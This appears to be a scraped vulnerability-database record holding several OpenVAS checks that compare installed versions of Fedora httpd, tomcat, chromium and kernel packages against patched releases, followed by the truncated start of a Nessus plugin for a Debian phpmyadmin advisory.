"OPENVAS:1361412562310872183", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872183", "title": "Fedora Update for httpd FEDORA-2016-d22f50d985", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for httpd FEDORA-2016-d22f50d985\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872183\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-26 06:03:39 +0100 (Mon, 26 Dec 2016)\");\n script_cve_id(\"CVE-2016-8743\", \"CVE-2016-2161\", \"CVE-2016-0736\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for httpd FEDORA-2016-d22f50d985\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'httpd'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"httpd on Fedora 24\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-d22f50d985\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VVGKB5F3K6FJ4OYOPBVOIZKD222R5HOA\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC24\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC24\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.4.25~1.fc24\", rls:\"FC24\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:35:31", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2016-12-16T00:00:00", "id": "OPENVAS:1361412562310872149", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872149", "title": "Fedora Update for tomcat FEDORA-2016-98cca07999", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for tomcat FEDORA-2016-98cca07999\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872149\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-16 06:03:10 +0100 (Fri, 16 Dec 2016)\");\n script_cve_id(\"CVE-2016-6816\", \"CVE-2016-6817\", \"CVE-2016-8735\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for tomcat FEDORA-2016-98cca07999\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'tomcat'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"tomcat on Fedora 25\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-98cca07999\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/GROU4JPVEOMXRKCZLSWVE36HA3PSXAEP\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC25\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"tomcat\", rpm:\"tomcat~8.0.39~1.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-22T16:38:12", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2016-12-16T00:00:00", "id": "OPENVAS:1361412562310872153", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872153", "title": "Fedora Update for chromium FEDORA-2016-e0e1cb2b2b", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for chromium FEDORA-2016-e0e1cb2b2b\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872153\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-16 06:04:03 +0100 (Fri, 16 Dec 2016)\");\n script_cve_id(\"CVE-2016-5199\", \"CVE-2016-5200\", \"CVE-2016-5201\", \"CVE-2016-5202\",\n \"CVE-2016-9651\", \"CVE-2016-5208\", \"CVE-2016-5207\", \"CVE-2016-5206\",\n \"CVE-2016-5205\", \"CVE-2016-5204\", \"CVE-2016-5209\", \"CVE-2016-5203\",\n \"CVE-2016-5210\", \"CVE-2016-5212\", \"CVE-2016-5211\", \"CVE-2016-5213\",\n \"CVE-2016-5214\", \"CVE-2016-5216\", \"CVE-2016-5215\", \"CVE-2016-5217\",\n \"CVE-2016-5218\", \"CVE-2016-5219\", \"CVE-2016-5221\", \"CVE-2016-5220\",\n \"CVE-2016-5222\", \"CVE-2016-9650\", \"CVE-2016-5223\", \"CVE-2016-5226\",\n \"CVE-2016-5225\", \"CVE-2016-5224\", \"CVE-2016-9652\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for chromium FEDORA-2016-e0e1cb2b2b\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'chromium'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"chromium on Fedora 24\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-e0e1cb2b2b\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZZECS3A7ULG4B4YXBKUZMA3NTQBE5HGU\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC24\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC24\")\n{\n\n if ((res = isrpmvuln(pkg:\"chromium\", rpm:\"chromium~55.0.2883.87~1.fc24\", rls:\"FC24\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-22T16:38:15", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2016-12-16T00:00:00", "id": "OPENVAS:1361412562310872151", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872151", "title": "Fedora Update for chromium FEDORA-2016-a815b7bf5d", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for chromium FEDORA-2016-a815b7bf5d\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872151\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-16 06:03:15 +0100 (Fri, 16 Dec 2016)\");\n script_cve_id(\"CVE-2016-5199\", \"CVE-2016-5200\", \"CVE-2016-5201\", \"CVE-2016-5202\",\n \"CVE-2016-9651\", \"CVE-2016-5208\", \"CVE-2016-5207\", \"CVE-2016-5206\",\n \"CVE-2016-5205\", \"CVE-2016-5204\", \"CVE-2016-5209\", \"CVE-2016-5203\",\n \"CVE-2016-5210\", \"CVE-2016-5212\", \"CVE-2016-5211\", \"CVE-2016-5213\",\n \"CVE-2016-5214\", \"CVE-2016-5216\", \"CVE-2016-5215\", \"CVE-2016-5217\",\n \"CVE-2016-5218\", \"CVE-2016-5219\", \"CVE-2016-5221\", \"CVE-2016-5220\",\n \"CVE-2016-5222\", \"CVE-2016-9650\", \"CVE-2016-5223\", \"CVE-2016-5226\",\n \"CVE-2016-5225\", \"CVE-2016-5224\", \"CVE-2016-9652\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for chromium FEDORA-2016-a815b7bf5d\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'chromium'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"chromium on Fedora 25\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-a815b7bf5d\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/7LGZO2VOGJOZUUXNQITD6YMIUQ2L5GTU\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC25\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"chromium\", rpm:\"chromium~55.0.2883.87~1.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:29", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2016-12-16T00:00:00", "id": "OPENVAS:1361412562310872150", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872150", "title": "Fedora Update for tomcat FEDORA-2016-9c33466fbb", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for tomcat FEDORA-2016-9c33466fbb\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872150\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-16 06:03:12 +0100 (Fri, 16 Dec 2016)\");\n script_cve_id(\"CVE-2016-6816\", \"CVE-2016-6817\", \"CVE-2016-8735\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for tomcat FEDORA-2016-9c33466fbb\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'tomcat'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"tomcat on Fedora 23\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-9c33466fbb\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PENNFBRKLWKJB57BLHAVVE7N7SNJZAAG\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC23\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC23\")\n{\n\n if ((res = isrpmvuln(pkg:\"tomcat\", rpm:\"tomcat~8.0.39~1.fc23\", rls:\"FC23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:06", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2016-12-14T00:00:00", "id": "OPENVAS:1361412562310872147", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872147", "title": "Fedora Update for kernel FEDORA-2016-107f03cc00", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kernel FEDORA-2016-107f03cc00\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872147\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-14 06:18:23 +0100 (Wed, 14 Dec 2016)\");\n script_cve_id(\"CVE-2016-8655\", \"CVE-2016-9793\", \"CVE-2016-9576\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for kernel FEDORA-2016-107f03cc00\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"kernel on Fedora 25\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-107f03cc00\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5XMVY4BIMY47JSWOISVOQZFFFGQTQ43D\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC25\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.8.13~300.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:19", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2016-12-14T00:00:00", "id": "OPENVAS:1361412562310872131", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872131", "title": "Fedora Update for kernel FEDORA-2016-5aff4a6bbc", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kernel FEDORA-2016-5aff4a6bbc\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872131\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-14 06:18:09 +0100 (Wed, 14 Dec 2016)\");\n script_cve_id(\"CVE-2016-8655\", \"CVE-2016-9793\", \"CVE-2016-9576\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for kernel FEDORA-2016-5aff4a6bbc\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"kernel on Fedora 23\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-5aff4a6bbc\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZK2RE73BDIZK7TU4WJI7CBME36KNGQ5A\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC23\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC23\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.8.13~100.fc23\", rls:\"FC23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:18", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2016-12-14T00:00:00", "id": "OPENVAS:1361412562310872137", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872137", "title": "Fedora Update for kernel FEDORA-2016-5cb5b4082d", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kernel FEDORA-2016-5cb5b4082d\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872137\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-14 06:18:14 +0100 (Wed, 14 Dec 2016)\");\n script_cve_id(\"CVE-2016-8655\", \"CVE-2016-9793\", \"CVE-2016-9576\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for kernel FEDORA-2016-5cb5b4082d\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"kernel on Fedora 24\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-5cb5b4082d\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/F6J7AQKLOTEHNSOMWM4PAYSG7H3UQNJ4\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC24\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC24\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.8.13~200.fc24\", rls:\"FC24\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2019-11-01T02:19:43", "bulletinFamily": "scanner", "description": "Multiple security vulnerabilities were fixed in phpmyadmin, a MySQL\nweb administration tool, which prevent possible SQL injection attacks,\nCSRF, the bypass of user restrictions, information disclosure or\ndenial of service.\n\nFor Debian 8 ", "modified": "2019-11-02T00:00:00", "id": "DEBIAN_DLA-1821.NASL", "href": "https://www.tenable.com/plugins/nessus/125957", "published": "2019-06-18T00:00:00", "title": "Debian DLA-1821-1 : phpmyadmin security update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-1821-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(125957);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2019/07/15 14:20:30\");\n\n script_cve_id(\"CVE-2016-6606\", \"CVE-2016-6607\", \"CVE-2016-6611\", \"CVE-2016-6612\", \"CVE-2016-6613\", \"CVE-2016-6624\", \"CVE-2016-6626\", \"CVE-2016-6627\", \"CVE-2016-6628\", \"CVE-2016-6630\", \"CVE-2016-6631\", \"CVE-2016-6632\", \"CVE-2016-9849\", \"CVE-2016-9850\", \"CVE-2016-9861\", \"CVE-2016-9864\", \"CVE-2019-12616\");\n\n script_name(english:\"Debian DLA-1821-1 : phpmyadmin security update\");\n script_summary(english:\"Checks dpkg output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n 